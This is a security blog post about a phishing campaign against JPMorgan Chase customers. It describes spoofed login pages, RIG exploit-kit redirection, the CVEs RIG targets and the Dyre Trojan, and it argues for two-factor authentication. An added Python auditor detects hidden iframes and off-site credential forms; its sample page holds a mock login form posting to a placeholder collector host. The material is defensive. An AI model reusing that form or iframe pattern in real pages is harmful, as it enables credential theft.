JPMorgan Chase Hack: Four Ways to Steal Your Credentials
If you needed more proof that authentication attacks are rising, look no further than the JP Morgan data breach, reported weeks ago. The investigation is still underway, but Proofpoint security researchers have analyzed the 150,000 phishing emails that hit JP Morgan Chase customers to find that attackers are rolling out more than one way to exploit stolen credentials.
In the campaign, dubbed ‘Smash & Grab’, Proofpoint found that the emails not only ask users to submit their credentials, but that the spoofed page also redirects users to the RIG exploit kit via a malicious iframe. RIG checks whether the visiting machine is vulnerable and, if so, installs the banking Trojan Dyre on it.
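The spoofed page described above combines two things a defender can check for when triaging a reported phishing URL: a credential form that posts off-site and a hidden cross-origin iframe that pulls in a second page. The following is an added example, not code from the original post or from Proofpoint; it uses only the standard library, and the hostnames in the constructed sample page are placeholders, not indicators from this campaign.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse


class PhishPageAuditor(HTMLParser):
    """Collects <iframe> and <form> tags and flags the two patterns
    described in the post: hidden cross-origin frames and credential
    forms whose action points at a different host than the page."""

    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)  # HTMLParser lowercases tag and attribute names
        if tag == "iframe":
            src = a.get("src", "")
            host = urlparse(src).hostname or self.page_host  # relative src = same host
            style = a.get("style", "").replace(" ", "").lower()
            hidden = (
                a.get("width") in ("0", "1") or a.get("height") in ("0", "1")
                or "display:none" in style or "visibility:hidden" in style
            )
            if host != self.page_host and hidden:
                self.findings.append(("hidden_cross_origin_iframe", src))
        elif tag == "form":
            action = a.get("action", "")
            host = urlparse(action).hostname
            if host and host != self.page_host:
                self.findings.append(("form_posts_offsite", action))


def audit_page(html, page_host):
    """Return a list of (finding_type, target_url) tuples for the page."""
    p = PhishPageAuditor(page_host)
    p.feed(html)
    return p.findings


# Constructed sample (placeholder domains): a login form posting to a
# collector host plus a 1x1 hidden iframe to a third host.
SAMPLE = """<html><body>
<form action="http://collector.example.net/login" method="post">
<input name="user"><input name="pass" type="password"></form>
<iframe src="http://landing.example.org/x.html" width="1" height="1"
        style="display: none"></iframe>
</body></html>"""

if __name__ == "__main__":
    for kind, target in audit_page(SAMPLE, "bank.example.com"):
        print(kind, target)
```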
Symantec reported that RIG checks a computer for certain vulnerabilities found in:
- Microsoft’s IE (CVE-2013-2551, CVE-2014-0322)
- Silverlight (CVE-2013-0074)
- Adobe Flash (CVE-2014-0497)
- Java (CVE-2013-2465, CVE-2012-0507)
This means even if a user doesn’t give away their password, there’s a chance their machine may be infected anyway.
If a user enters their credentials into the spoofed page, they’re served an error report telling them they need a Java update. Users are then prompted to download a fake Java executable file, which effectively installs the Dyre Trojan on their machine.
The Remote Access Trojan (RAT) Dyre is designed to steal passwords and data. This newly discovered Trojan, first reported in June, can bypass SSL within the browser to steal credentials, and it targets a list of U.S. and internationally-based banks including Bank of America, NatWest, Citibank, RBS and Ulster Bank, according to DarkReading.com. One distinction of this malware is that it doesn’t encrypt any of the data it POSTs back to the attacker’s command and control (C&C) servers.
Other credential-harvesting email methods include PDF and zip attachments that attempt to install Dyre once users open them. Whew - that’s a lot of ways attackers are trying to steal your credentials.
These attacks put heavy emphasis on the importance of stealing credentials (even at the risk of getting found out by using multiple different methods to procure legitimate usernames/passwords), whether via malware or traditional social engineering means. As the SANS Institute Editor’s Note by William Hugh Murray pointed out in the SANS NewsBites Vol. 16 Num. 69 e-newsletter:
The layered security architectures of money center banks are the targets of daily and resourceful attacks. Almost by definition, some of these attacks enjoy at least limited success. If there were no success at all, the attackers would tire, retire, or seek softer targets. That said, such success should not, as in this case, include "gigabytes of sensitive data." That it did so suggests insufficient layers and monitoring. Strong Authentication should be the first layer.
By enabling two-factor authentication as the first layer of defense, online banking and financial firms can protect themselves and their users from attacks in which a stolen password is used to authenticate successfully from a remote location and device.
Two-factor authentication is highly recommended by the Federal Financial Institutions Examination Council (FFIEC), the governing body working to secure and standardize web-based financial services for the industry. The FFIEC states that single-factor authentication (only a username and password) is not adequate for:
- Sensitive communications
- High-dollar value transactions
- Privileged user access (i.e., network administrators)
They also recommend using out-of-band authentication (OOBA) for transactions on the premise that it is more secure than other two-factor authentication methods. Find out more about the standards and learn more about OOBA in Answer to OTP Bypass: Out-of-Band Two-Factor Authentication.
Read up on financial and online banking security in:
- Two-Factor Authentication, Financial Firms, and You
- Two-Factor Authentication for Bank Wire Transfers
- Facing Modern Information Security Challenges in Banking & Finance
- ATM Admin Panels Hacked to Allow Unlimited Withdrawals, Warns FFIEC
- Modern Two-Factor: Could It Have Prevented Bitcoin Breaches?